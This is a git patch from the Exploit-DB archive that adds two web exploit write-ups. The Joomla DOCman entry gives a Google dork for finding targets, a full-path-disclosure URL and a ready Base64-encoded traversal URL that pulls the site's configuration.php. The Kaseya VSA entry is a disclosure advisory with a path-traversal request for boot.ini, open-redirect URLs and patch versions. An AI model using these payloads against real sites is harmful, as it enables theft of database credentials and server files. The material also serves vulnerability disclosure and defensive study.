From 9657eacb4d019ef0950fcfa9b8603a554fd6c883 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 16 Jul 2015 05:01:51 +0000 Subject: [PATCH] DB: 2015-07-16 2 new exploits --- files.csv | 2 + platforms/php/webapps/37620.txt | 30 ++++++++++++++ platforms/windows/webapps/37621.txt | 63 +++++++++++++++++++++++++++++ 3 files changed, 95 insertions(+) create mode 100755 platforms/php/webapps/37620.txt create mode 100755 platforms/windows/webapps/37621.txt diff --git a/files.csv b/files.csv index 53e0e6f01..170e15f14 100755 --- a/files.csv +++ b/files.csv @@ -33878,6 +33878,7 @@ id,file,description,date,author,platform,type,port 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 +37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities",2015-07-15,"Pedro Ribeiro",windows,webapps,0 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 @@ -33954,3 +33955,4 @@ id,file,description,date,author,platform,type,port 37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 +37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 diff --git a/platforms/php/webapps/37620.txt b/platforms/php/webapps/37620.txt new file mode 100755 index 000000000..2a3cf356f --- /dev/null +++ b/platforms/php/webapps/37620.txt @@ -0,0 +1,30 @@ +# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) +# CWE: CWE-200(FPD) CWE-98(LFI/LFD) +# Risk: High +# Author: Hugo Santiago dos Santos +# Contact: hugo.s@linuxmail.org +# Date: 13/07/2015 +# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman +# Google Dork: inurl:"/components/com_docman/dl2.php" + +# Xploit (FPD): + + Get one target and just download with blank parameter: + http://www.site.com/components/com_docman/dl2.php?archive=0&file= + + In title will occur Full Path Disclosure of server. + +# Xploit (LFD/LFI): + + http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF] + + Let's Xploit... + + First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64: + + ../../../../../../../target/www/configuration.php <= Not Ready + + http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready ! + + +And Now we have a configuration file... \ No newline at end of file diff --git a/platforms/windows/webapps/37621.txt b/platforms/windows/webapps/37621.txt new file mode 100755 index 000000000..ed70a2f2c --- /dev/null +++ b/platforms/windows/webapps/37621.txt @@ -0,0 +1,63 @@ +tl;dr +Two vulns in Kaseya Virtual System Administrator - an authenticated +arbitrary file download and two lame open redirects. + +Full advisory text below and at [1]. Thanks to CERT for helping me to +disclose these vulnerabilities [2]. + +>> Multiple vulnerabilities in Kaseya Virtual System Administrator +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) +========================================================================== +Disclosure: 13/07/2015 / Last updated: 13/07/2015 + +>> Background on the affected product: +"Kaseya VSA is an integrated IT Systems Management platform that can +be leveraged seamlessly across IT disciplines to streamline and +automate your IT services. Kaseya VSA integrates key management +capabilities into a single platform. Kaseya VSA makes your IT staff +more productive, your services more reliable, your systems more +secure, and your value easier to show." + + +>> Technical details: +#1 +Vulnerability: Arbitary file download (authenticated) +Affected versions: unknown, at least v9 + +GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini +Referer: http://10.0.0.3/ + +A valid login is needed, and the Referrer header must be included. A +sample request can be obtained by downloading any file attached to any +ticket, and then modifying it with the appropriate path traversal. +This will download the C:\boot.ini file when Kaseya is installed in +the default C:\Kaseya directory. The file download root is the +WebPages directory (\WebPages\). + + +#2 +Vulnerability: Open redirect (unauthenticated) +Affected versions: unknown, at least v7 to XXX + +a) +http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com + +b) +GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com +Host: www.google.com +(host header has to be spoofed to the target) + + +>> Fix: +R9.1: install patch 9.1.0.4 +R9.0: install patch 9.0.0.14 +R8.0: install patch 8.0.0.18 +V7.0: install patch 7.0.0.29 + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> + +[1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt +[2] https://www.kb.cert.org/vuls/id/919604